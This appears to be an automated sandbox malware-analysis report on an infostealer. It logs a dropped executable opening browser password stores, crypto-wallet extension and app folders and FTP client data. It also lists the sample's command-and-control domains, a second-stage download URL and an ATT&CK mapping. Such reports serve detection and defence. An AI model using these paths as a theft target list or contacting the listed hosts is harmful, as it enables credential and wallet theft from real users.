        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: Yara matchFile source: 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: BF85.tmp.exe PID: 2828, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218BC
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BE6
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021B1B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_021B1B23
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021B0E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_021B0E4D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        12
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        4
        Obfuscated Files or Information
        LSASS Memory12
        File and Directory Discovery
        Remote Desktop Protocol41
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)22
        Software Packing
        Security Account Manager44
        System Information Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS31
        Security Software Discovery
        Distributed Component Object Model3
        Clipboard Data
        124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets1
        Virtualization/Sandbox Evasion
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Ljrprfl3BH.exe39%VirustotalBrowse
        Ljrprfl3BH.exe50%ReversingLabsWin32.Trojan.Generic
        Ljrprfl3BH.exe100%AviraHEUR/AGEN.1312582
        Ljrprfl3BH.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Temp\BF85.tmp.exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\BF85.tmp.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://skidjazzyric.click/100%Avira URL Cloudmalware
        soundtappysk.shop100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exeX0%Avira URL Cloudsafe
        robinsharez.shop100%Avira URL Cloudmalware
        crowdwarek.shop100%Avira URL Cloudmalware
        versersleep.shop100%Avira URL Cloudmalware
        https://skidjazzyric.click/api100%Avira URL Cloudmalware
        handscreamny.shop100%Avira URL Cloudmalware
        skidjazzyric.click100%Avira URL Cloudmalware
        apporholis.shop100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe90%Avira URL Cloudsafe
        https://post-to-me.com/track_prt.php?sub=0&cc=DE100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE0%Avira URL Cloudsafe
        chipdonkeruz.shop100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exeTr0%Avira URL Cloudsafe
        femalsabler.shop100%Avira URL Cloudmalware
        https://skidjazzyric.click:443/api100%Avira URL Cloudmalware
        https://skidjazzyric.click/apiXxZ9NjAAA=100%Avira URL Cloudmalware
        https://post-to-me.com/100%Avira URL Cloudmalware
        https://skidjazzyric.click:443/api:100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        post-to-me.com
        104.21.56.70
        truefalse
          unknown
          skidjazzyric.click
          104.21.64.1
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            robinsharez.shoptrue
            • Avira URL Cloud: malware
            unknown
            versersleep.shoptrue
            • Avira URL Cloud: malware
            unknown
            https://skidjazzyric.click/apitrue
            • Avira URL Cloud: malware
            unknown
            soundtappysk.shoptrue
            • Avira URL Cloud: malware
            unknown
            crowdwarek.shoptrue
            • Avira URL Cloud: malware
            unknown
            skidjazzyric.clicktrue
            • Avira URL Cloud: malware
            unknown
            handscreamny.shoptrue
            • Avira URL Cloud: malware
            unknown
            apporholis.shoptrue
            • Avira URL Cloud: malware
            unknown
            https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
            • Avira URL Cloud: malware
            unknown
            chipdonkeruz.shoptrue
            • Avira URL Cloud: malware
            unknown
            femalsabler.shoptrue
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://post-to-me.com/track_prt.php?sub=&cc=DELjrprfl3BH.exe, 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
              high
              https://duckduckgo.com/chrome_newtabBF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoBF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://crl.microHBF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://skidjazzyric.click/BF85.tmp.exe, 00000003.00000002.2393532432.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2351320753.0000000000889000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2335505836.0000000000889000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000002.2393770639.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://176.113.115.19/ScreenUpdateSync.exeXLjrprfl3BH.exe, 00000000.00000003.2265071299.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.rootca1.amazontrust.com/rootca1.crl0BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://upx.sf.netAmcache.hve.7.drfalse
                            high
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.rootca1.amazontrust.com0:BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.ecosia.org/newtab/BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://176.113.115.19/ScreenUpdateSync.exeLjrprfl3BH.exe, 00000000.00000003.2265071299.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://ac.ecosia.org/autocomplete?q=BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://post-to-me.com/track_prt.php?sub=Ljrprfl3BH.exefalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARELjrprfl3BH.exe, 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://x1.c.lencr.org/0BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://x1.i.lencr.org/0BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://176.113.115.19/ScreenUpdateSync.exeTrLjrprfl3BH.exe, 00000000.00000002.4666397816.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://post-to-me.com/Ljrprfl3BH.exe, 00000000.00000002.4666397816.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://176.113.115.19/ScreenUpdateSync.exe9Ljrprfl3BH.exe, 00000000.00000003.2265071299.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://skidjazzyric.click:443/apiBF85.tmp.exe, 00000003.00000003.2320794953.0000000002E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://support.mozilla.org/products/firefoxgro.allBF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.mozilla.orBF85.tmp.exe, 00000003.00000003.2337560118.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
